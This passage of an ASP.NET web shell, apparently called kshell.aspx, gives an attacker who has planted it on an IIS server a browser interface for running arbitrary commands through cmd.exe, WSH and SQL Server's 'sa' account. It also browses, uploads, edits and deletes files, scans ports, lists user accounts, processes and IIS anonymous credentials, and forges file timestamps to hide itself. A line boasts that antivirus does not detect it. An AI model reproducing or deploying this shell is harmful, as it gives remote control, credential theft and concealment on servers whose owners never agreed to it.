  1045.     response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
  1046. next
  1047. %>
  1048.  
  1049. </td>
  1050. <td align="Left">
  1051. <%
  1052. response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")
  1053. %>
  1054. </td>
  1055.   </tr>
  1056.  
  1057.   <tr>
  1058.     <td>Tool:</td>
  1059.     <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a></td>    
  1060.   </tr>
  1061.   <tr>
  1062.     <td> </td>
  1063.     <td><a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a></td>
  1064.   </tr>
  1065. </table>
  1066. <hr>
  1067. <table width=100% class=main cellspacing=0 cellpadding=1><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>
  1068.  
  1069.  
  1070.       <tr>
  1071.         <td><%
  1072.         guru= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><b>[..]</b></a></td></tr>"
  1073.         response.Write(guru)
  1074.                 dim lll
  1075.                 lll=1
  1076.         for each xdir in mydir.getdirectories()
  1077.             response.Write("<tr>")
  1078.             dim filepath as string
  1079.             filepath=server.UrlEncode(url & xdir.name)
  1080.                         if lll=1 then
  1081.                            lll=2
  1082.                         else
  1083.                            lll=1
  1084.                         end if
  1085.             guru= "<tr class=l" & lll & "><td><a href='?action=goto&src=" & filepath & "\" & "'><b>[" & xdir.name & "]</b></a></td>"
  1086.             response.Write(guru)
  1087.             response.Write("<td>&lt;dir&gt;</td>")
  1088.             response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
  1089.             guru="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
  1090.             response.Write(guru)
  1091.             response.Write("</tr>")
  1092.         next
  1093.         %></td>
  1094.   </tr>
  1095.         <tr>
  1096.         <td><%
  1097.         for each xfile in mydir.getfiles()
  1098.             dim filepath2 as string
  1099.             filepath2=server.UrlEncode(url & xfile.name)
  1100.             response.Write("<tr>")
  1101.                         if lll=1 then
  1102.                            lll=2
  1103.                         else
  1104.                            lll=1
  1105.                         end if
  1106.                         guru= "<tr class=l" & lll & "><td><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a></td>"
  1107.             response.Write(guru)
  1108.             guru="<td>" & GetSize(xfile.length) & "</td>"
  1109.             response.Write(guru)
  1110.             response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
  1111.             guru="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"           
  1112.             response.Write(guru)
  1113.             response.Write("</tr>")
  1114.         next
  1115.         response.Write("</table>")
  1116.         %></td>
  1117.       </tr>
  1118. </table>
  1119. <script language="javascript">
  1120. function del()
  1121. {
  1122. if(confirm("Are you sure?")){return true;}
  1123. else{return false;}
  1124. }
  1125. function down()
  1126. {
  1127. if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
  1128. else{return false;}
  1129. }
  1130. </script>
  1131. <%
  1132. case "information"
  1133.     dim CIP,CP as string
  1134.     if getIP()<>request.ServerVariables("REMOTE_ADDR") then
  1135.             CIP=getIP()
  1136.             CP=request.ServerVariables("REMOTE_ADDR")
  1137.     else
  1138.             CIP=request.ServerVariables("REMOTE_ADDR")
  1139.             CP="None"
  1140.     end if
  1141. %>
  1142. <div align=center>[ Web Server Information ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></div><br>
  1143. <table width="100%"  border="1" align="center">
  1144.   <tr>
  1145.     <td width="40%">Server IP</td>
  1146.     <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  1147.   </tr>
  1148.   <tr>
  1149.     <td height="73">Machine Name</td>
  1150.     <td><%=Environment.MachineName%></td>
  1151.   </tr>
  1152.   <tr>
  1153.     <td>Network Name</td>
  1154.     <td><%=Environment.UserDomainName.ToString()%></td>
  1155.   </tr>
  1156.   <tr>
  1157.     <td>User Name in this Process</td>
  1158.     <td><%=Environment.UserName%></td>
  1159.   </tr>
  1160.   <tr>
  1161.     <td>OS Version</td>
  1162.     <td><%=Environment.OSVersion.ToString()%></td>
  1163.   </tr>
  1164.   <tr>
  1165.     <td>Started Time</td>
  1166.     <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  1167.   </tr>
  1168.   <tr>
  1169.     <td>System Time</td>
  1170.     <td><%=now%></td>
  1171.   </tr>
  1172.   <tr>
  1173.     <td>IIS Version</td>
  1174.     <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  1175.   </tr>
  1176.   <tr>
  1177.     <td>HTTPS</td>
  1178.     <td><%=request.ServerVariables("HTTPS")%></td>
  1179.   </tr>
  1180.   <tr>
  1181.     <td>PATH_INFO</td>
  1182.     <td><%=request.ServerVariables("PATH_INFO")%></td>
  1183.   </tr>
  1184.   <tr>
  1185.     <td>PATH_TRANSLATED</td>
  1186.     <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  1187.   <tr>
  1188.     <td>SERVER_PORT</td>
  1189.     <td><%=request.ServerVariables("SERVER_PORT")%></td>
  1190.   </tr>
  1191.     <tr>
  1192.     <td>SeesionID</td>
  1193.     <td><%=Session.SessionID%></td>
  1194.   </tr>
  1195.   <tr>
  1196.     <td colspan="2"><span class="style3">Client Infomation</span></td>
  1197.   </tr>
  1198.   <tr>
  1199.     <td>Client Proxy</td>
  1200.     <td><%=CP%></td>
  1201.   </tr>
  1202.   <tr>
  1203.     <td>Client IP</td>
  1204.     <td><%=CIP%></td>
  1205.   </tr>
  1206.   <tr>
  1207.     <td>User</td>
  1208.     <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
  1209.   </tr>
  1210. </table>
  1211. <table align=center>
  1212.     <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
  1213.     <tr>
  1214.         <td><textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea></td>
  1215.         <td><textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea></td>
  1216.     </tr>
  1217. </table>
  1218. <%
  1219.     case "cmd"
  1220. %>
  1221. <form runat="server">
  1222.   <p>[ CMD.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1223.   <p> Execute command with ASP.NET account(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1224.   <p>- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-</p>
  1225.   Command:
  1226.   <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
  1227.   <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="buttom"/>  
  1228.   <p>
  1229.    <asp:Label ID="result" runat="server" style="style2"/>      </p>
  1230. </form>
  1231. <%
  1232.     case "cmdw32"
  1233. %>
  1234. <form runat="server">
  1235.     <p>[ ASP.NET W32 Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1236.     <p> Execute command with ASP.NET account using W32(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1237.     <%
  1238.     Response.Write("System Dir : "+Environment.SystemDirectory +"<br><br>")
  1239.     %>
  1240.     CMD File:
  1241.     <asp:TextBox ID="txtCmdFile" runat="server" Width="473px" style="border: 1px solid #084B8E">C:\\WINDOWS\\system32\\cmd.exe</asp:TextBox><br><br>
  1242.     Command:&nbsp;
  1243.     <asp:TextBox ID="txtCommand1" runat="server" style="border: 1px solid #084B8E"/>
  1244.     <asp:Button ID="Buttoncmdw32" runat="server" Text="Run" OnClick="RunCmdW32" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1245.     <p>
  1246.     <asp:Label ID="resultcmdw32" runat="server" style="color: #0000FF"/>      
  1247.     </p>
  1248. </form>
  1249. <%
  1250.     case "cmdwsh"
  1251. %>
  1252. <form runat="server">
  1253.     <p>[ ASP.NET WSH Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1254.     <p> Execute command with ASP.NET account using WSH(<span class="style3">Notice: only click &quot;Run&quot; to run</span>)</p>
  1255.     Command:
  1256.     <asp:TextBox ID="txtCommand2" runat="server" style="border: 1px solid #084B8E"/>
  1257.     <asp:Button ID="Buttoncmdwsh" runat="server" Text="Run" OnClick="RunCmdWSH" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1258.     <p>
  1259.     <asp:Label ID="resultcmdwsh" runat="server" style="color: #0000FF"/>      
  1260.     </p>
  1261. </form>
  1262. <%
  1263.     case "pro1"
  1264. %>
  1265. <form runat="server">
  1266.     <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1267.     <table align=center>
  1268.         <tr>
  1269.             <td>
  1270.             <%
  1271.                 Try
  1272.                 output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount")
  1273.                 Catch
  1274.                 rw("This function is disabled by server")
  1275.                 End Try
  1276.             %>
  1277.             </td>
  1278.         </tr>
  1279.     </table>
  1280. </form>
  1281. <%
  1282.     case "pro2"
  1283. %>
  1284. <form runat="server">
  1285.     <p align=center>[ List processes from server ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1286.     <table align=center width='80%'>
  1287.         <tr>
  1288.             <td>
  1289.             <%
  1290.                 Dim htmlbengin As String = "<table width='80%' align=center border=0><tr align=center><td width='20%'><b>ID</b></td><td align=left width='20%'><b>Process</b></td><td align=left width='20%'><b>MemorySize</b></td><td align=center width='10%'><b>Threads</b></td></tr>"
  1291.                   Dim prostr As String = ""
  1292.                   Dim htmlend As String = "</tr></table>"
  1293.                   Try
  1294.                         Dim mypro As Process() = Process.GetProcesses()
  1295.                         For Each p As Process In mypro
  1296.                               prostr += "<tr><td align=center>" + p.Id.ToString() + "</td>"
  1297.                               prostr += "<td align=left>" + p.ProcessName.ToString() + "</td>"
  1298.                               prostr += "<td align=left>" + p.WorkingSet.ToString() + "</td>"
  1299.                               prostr += "<td align=center>" + p.Threads.Count.ToString() + "</td>"
  1300.                         Next
  1301.                   Catch ex As Exception
  1302.                         Response.write(ex.Message)
  1303.                   End Try
  1304.                   Response.write(htmlbengin + prostr + htmlend)
  1305.             %>
  1306.             </td>
  1307.         </tr>
  1308.     </table>
  1309. </form>
  1310. <%
  1311.     case "user"
  1312. %>
  1313. <form runat="server">
  1314.     <p align=center>[ List User Accounts ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1315.     <table align=center>
  1316.         <tr>
  1317.             <td>
  1318.             <%
  1319.                 dim WMI_function = "Win32_UserAccount"     
  1320.                 dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID"
  1321.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1322.                 Try
  1323.                 output_wmi_function_data(WMI_function,Fields_to_load)
  1324.                 Catch
  1325.                 rw(fail_description)
  1326.                 End Try
  1327.             %>
  1328.             </td>
  1329.         </tr>
  1330.     </table>
  1331. </form>
  1332. <%
  1333.     case "reg"
  1334. %>
  1335. <form runat="server">
  1336.     <p align=center>[ Registry ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1337.     <table align=center>
  1338.         <tr>
  1339.             <td>
  1340.             <%
  1341.                 dim WMI_function = "Win32_Registry"    
  1342.                 dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status"
  1343.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1344.                 Try
  1345.                 output_wmi_function_data(WMI_function,Fields_to_load)
  1346.                 Catch
  1347.                 rw(fail_description)
  1348.                 End Try
  1349.             %>
  1350.             </td>
  1351.         </tr>
  1352.     </table>
  1353. </form>
  1354. <%
  1355.     case "applog"
  1356. %>
  1357. <form runat="server">
  1358.     <p align=center>[ List Application Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1359.     <table align=center>
  1360.         <tr>
  1361.             <td>
  1362.             <%
  1363.                 dim WMI_function = "Win32_NTLogEvent where Logfile='Application'"      
  1364.                 dim Fields_to_load = "Logfile,Message,type"
  1365.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1366.                 Try
  1367.                 output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
  1368.                 Catch
  1369.                 rw(fail_description)
  1370.                 End Try
  1371.             %>
  1372.             </td>
  1373.         </tr>
  1374.     </table>
  1375. </form>
  1376. <%
  1377.     case "syslog"
  1378. %>
  1379. <form runat="server">
  1380.     <p align=center>[ List System Event Log Entries ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1381.     <table align=center>
  1382.         <tr>
  1383.             <td>
  1384.             <%
  1385.                 dim WMI_function = "Win32_NTLogEvent where Logfile='System'"       
  1386.                 dim Fields_to_load = "Logfile,Message,type"
  1387.                 dim fail_description = " Access to " + WMI_function + " is protected"
  1388.                
  1389.                 Try
  1390.                 output_wmi_function_data_instances(WMI_function,Fields_to_load,2000)
  1391.                 Catch
  1392.                 rw("This function is disabled by server")
  1393.                 End Try
  1394.             %>
  1395.             </td>
  1396.         </tr>
  1397.     </table>
  1398. </form>
  1399. <%
  1400.     case "auser"
  1401. %>
  1402. <form runat="server">
  1403.     <p align=center>[ IIS List Anonymous' User details ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1404.     <table align=center>
  1405.         <tr>
  1406.             <td>
  1407.             <%
  1408.                 Try
  1409.                 IIS_list_Anon_Name_Pass
  1410.                 Catch
  1411.                 rw("This function is disabled by server")
  1412.                 End Try
  1413.             %>
  1414.             </td>
  1415.         </tr>
  1416.     </table>
  1417. </form>
  1418. <%
  1419.     case "scan"
  1420. %>
  1421.     <form runat="server">
  1422.     <p>[ ASP.NET Port Scanner ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1423.     <div>
  1424.         C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)<br /><br />
  1425.         Start IP :&nbsp;&nbsp;<asp:TextBox ID="txtStartIP" runat="server" Width="177px">127.0.0.1</asp:TextBox>
  1426.         &nbsp;&nbsp; &nbsp; --- &nbsp;End Ip : &nbsp;<asp:TextBox ID="txtEndIP" runat="server" Width="185px">127.0.0.1</asp:TextBox>&nbsp;
  1427.         <br />
  1428.         Ports &nbsp;&nbsp;&nbsp;:&nbsp;&nbsp;<asp:TextBox ID="txtPorts" runat="server" Width="473px">21,25,80,1433,3306,3389</asp:TextBox><br />
  1429.         <br />
  1430.         <asp:Button ID="btnScan" runat="server" Text="Scan" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnScan_Click" />
  1431.         &nbsp;&nbsp;
  1432.         <asp:Button ID="btnReset" runat="server" Text="Reset" Width="60px" Font-Bold="True" ForeColor="MediumBlue" BorderStyle="Solid" OnClick="btnReset_Click" /><br />
  1433.         <br />
  1434.         <asp:Label ID="Label1" runat="server" Text="Result:" Visible="False" Width="70px"></asp:Label><br />
  1435.         <asp:ListBox ID="lstRet" runat="server" BackColor="Black" ForeColor="#00C000" Height="251px"
  1436.             Width="527px" Visible="False"></asp:ListBox>
  1437.         <hr align=left style="width: 526px" />
  1438.         <br />
  1439.        </div>
  1440.     </form>
  1441. <%
  1442. case "iisspy"
  1443. %>
  1444.     <p align=center>[ IIS Spy ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1445.     <%
  1446.                 Try
  1447.                 Response.write(IISSpy())
  1448.                 Catch
  1449.                 rw("This function is disabled by server")
  1450.                 End Try
  1451.     %>
  1452. <%
  1453. case "sqltool"
  1454. %>
  1455.     <p align=center>[ SQL Tool ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1456.     <%
  1457.                 Try
  1458.                
  1459.                 Catch
  1460.                 rw("This function is disabled by server")
  1461.                 End Try
  1462.     %>
  1463. <%
  1464. case "regshell"
  1465. %>
  1466.     <form runat="server">
  1467.     <p align=center >[ Registry Shell ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1468.     Key:&nbsp;&nbsp;
  1469.     <asp:TextBox ID="txtRegKey" runat="server" style="width: 595px; border: 1px solid #084B8E">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br><br>
  1470.     Value:
  1471.     <asp:TextBox ID="txtRegValue" runat="server" style="border: 1px solid #084B8E">ComputerName</asp:TextBox>&nbsp;&nbsp;
  1472.     <asp:Button ID="btnReadReg" runat="server" Text="Run" OnClick="RegistryRead" style="color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5"/>  
  1473.     <p>
  1474.     <asp:Label ID="lblresultReg" runat="server" style="color: red"/>      
  1475.     </p>
  1476.     </form>
  1477. <%
  1478.     case "sqlman"
  1479. %>
  1480. <form runat="server">
  1481.   <p>[ MSSQL Query ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1482.   <p> Execute query with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  1483.   <p>Host:
  1484.     <asp:TextBox ID="txtHost" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  1485.   <p>
  1486.   SQL Name:
  1487.     <asp:TextBox ID="txtSqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  1488.   SQL Password:
  1489.   <asp:TextBox ID="txtSqlPass" runat="server" Width="80" class="TextBox"/>
  1490.   </p>
  1491.   Command:
  1492.   <asp:TextBox ID="txtSqlcmd" runat="server" Width="500" class="TextBox" TextMode="MultiLine" Rows="6"/></br>
  1493.   <asp:Button ID="btnButtonSQL" runat="server" Text="Run" OnClick="RunSQLQUERY" class="buttom" Width="100"/>  
  1494.   <p>
  1495.    <asp:Label ID="lblresultSQL" runat="server" style="style2"/>      </p>
  1496. </form>
  1497. <%
  1498.     case "sqlrootkit"
  1499. %>
  1500. <form runat="server">
  1501.   <p>[ SqlRootKit.NET for WebAdmin ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<i><a href="javascript:history.back(1);">Back</a></i></p>
  1502.   <p> Execute command with SQLServer account(<span class="style3">Notice: only click "Run" to run</span>)</p>
  1503.   <p>Host:
  1504.     <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
  1505.   <p>
  1506.   SQL Name:
  1507.     <asp:TextBox ID="SqlName" runat="server" Width="50" class="TextBox" Text='sa'/>
  1508.   SQL Password:
  1509.   <asp:TextBox ID="SqlPass" runat="server" Width="80" class="TextBox"/>
  1510.   </p>
  1511.   Command:
  1512.   <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
  1513.   <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="buttom"/>  
  1514.   <p>
  1515.    <asp:Label ID="resultSQL" runat="server" style="style2"/>      </p>
  1516. </form>
  1517. <%
  1518.     case "del"
  1519.         dim a as string
  1520.         a=request.QueryString("src")
  1521.         call existdir(a)
  1522.         call del(a)  
  1523.         response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
  1524.     case "copy"
  1525.         call existdir(request.QueryString("src"))
  1526.         session("cutboard")="" & request.QueryString("src")
  1527.         response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
  1528.     case "cut"
  1529.         call existdir(request.QueryString("src"))
  1530.         session("cutboard")="" & request.QueryString("src")
  1531.         response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>")
  1532.     case "paste"
  1533.         dim ow as integer
  1534.         if request.Form("OverWrite")<>"" then ow=1
  1535.         if request.Form("Cancel")<>"" then ow=2
  1536.         url=request.QueryString("src")
  1537.         call existdir(url)
  1538.         dim d as string
  1539.         d=session("cutboard")
  1540.         if left(d,1)="" then
  1541.             TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  1542.             TEMP2=url & replace(path.getfilename(d),"","")
  1543.             if right(d,1)="\" then  
  1544.                 call xexistdir(TEMP1,ow)
  1545.                 directory.move(replace(d,"",""),TEMP1 & "\")  
  1546.                 response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1547.             else
  1548.                 call xexistdir(TEMP2,ow)
  1549.                 file.move(replace(d,"",""),TEMP2)
  1550.                 response.Write("<script>alert('Cut  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1551.             end if
  1552.         else
  1553.             TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  1554.             TEMP2=url & path.getfilename(replace(d,"",""))
  1555.             if right(d,1)="\" then
  1556.                 call xexistdir(TEMP1,ow)
  1557.                 directory.createdirectory(TEMP1)
  1558.                 call copydir(replace(d,"",""),TEMP1 & "\")
  1559.                 response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP1 & "\","\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1560.             else
  1561.                 call xexistdir(TEMP2,ow)
  1562.                 file.copy(replace(d,"",""),TEMP2)
  1563.                 response.Write("<script>alert('Copy  " & replace(replace(d,"",""),"\","\\") & "  to  " & replace(TEMP2,"\","\\") & "  success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  1564.             end if
  1565.         end if
  1566.     case "upfile"
  1567.         url=request.QueryString("src")
  1568. %>
  1569. <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server"  onSubmit="return checkname();">
  1570.  You will upload file to this directory : <span class="style3"><%=url%></span><br>
  1571.  Please choose file from your computer :
  1572.  <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server">
  1573.     <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="buttom">
  1574. </form>
  1575. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a>
  1576. <%
  1577.     case "new"
  1578.         url=request.QueryString("src")
  1579. %>
  1580. <form runat="server">
  1581.   <%=url%><br>
  1582.   Name:
  1583.   <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  1584.   <br>
  1585.   <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  1586.   <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server"  GroupName="New"/>
  1587.   <br>
  1588.   <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="buttom"  OnClick="NewFD"/>  
  1589.   <input name="Src" type="hidden" value="<%=url%>">
  1590. </form>
  1591. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1592. <%
  1593.     case "edit"
  1594.         dim b as string
  1595.         b=request.QueryString("src")
  1596.         call existdir(b)
  1597.         dim myread as new streamreader(b,encoding.default)
  1598.         filepath.text=b
  1599.         content.text=myread.readtoend
  1600. %>
  1601. <form runat="server">
  1602.   <table width="100%"  border="1" align="center">
  1603.     <tr>      <td width="11%">Path</td>
  1604.       <td width="89%">
  1605.       <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
  1606.       *</td>
  1607.     </tr>
  1608.     <tr>
  1609.       <td>Content</td>
  1610.       <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
  1611.     </tr>
  1612.     <tr>
  1613.       <td></td>
  1614.       <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="buttom"/>        
  1615.       </td>
  1616.     </tr>
  1617.   </table>
  1618. </form>
  1619. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1620. <%
  1621.         myread.close
  1622.     case "rename"
  1623.         url=request.QueryString("src")
  1624.         if request.Form("name")="" then
  1625.     %>
  1626. <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  1627.   <p>You will rename <span class="style3"><%=request.QueryString("src")%></span>to: <%=getparentdir(request.QueryString("src"))%>
  1628.     <input type="text" name="name" class="TextBox">
  1629.     <input type="submit" name="Submit3" value="Submit" class="buttom">
  1630. </p>
  1631. </form>
  1632. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1633. <script language="javascript">
function checkname()
{
    // Client-side check for the rename form (formRn): refuse to submit
    // while the "name" field is empty. Nothing here validates the name
    // on the server side.
    var enteredName = formRn.name.value;
    if (enteredName != "") {
        return;
    }
    alert("You shall input filename :(");
    return false;
}
  1638. </script>
  1639.   <%
  1640.         else
  1641.             if Rename() then
  1642.                 response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  1643.             else
  1644.                 response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  1645.             end if
  1646.         end if
  1647.     case "samename"
  1648.         url=request.QueryString("src")
  1649. %>
  1650. <form name="form1" method="post" action="?action=paste&src=<%=server.UrlEncode(url)%>">
  1651. <p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  1652.   <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="buttom">
  1653. <input name="Cancel" type="submit" id="Cancel" value="No" class="buttom">
  1654. </form>
  1655. <a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a>
  1656.    <%
  1657.     case "clonetime"
  1658.         time1.Text=request.QueryString("src")&"kshell.aspx"
  1659.         time2.Text=request.QueryString("src")
  1660.     %>
  1661. <form runat="server">
  1662.   <p>[CloneTime for WebAdmin]<i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:history.back(1);">Back</a></i> </p>
  1663.   <p>A tool that it copy the file or directory's time to another file or directory </p>
  1664.   <p>Rework File or Dir:
  1665.     <asp:TextBox CssClass="TextBox" ID="time1" runat="server" Width="300"/></p>
  1666.   <p>Copied File or Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  1667.     <asp:TextBox CssClass="TextBox" ID="time2" runat="server" Width="300"/></p>
  1668. <asp:Button ID="ButtonClone" Text="Submit" runat="server" CssClass="buttom" OnClick="CloneTime"/>
  1669. </form>
  1670. <p>
  1671.   <%
  1672.     case "logout"
  1673.         session.Abandon()
  1674.         response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>")
  1675.     end select
  1676. end if
  1677. Catch error_x
  1678.     response.Write("<font color=""red""><br>Wrong: </font>"&error_x.Message)
  1679. End Try
  1680. %>
  1681. </p>
  1682. </p>
  1683. <hr>
  1684. <script language="javascript">
// Closes the browser window this page is running in.
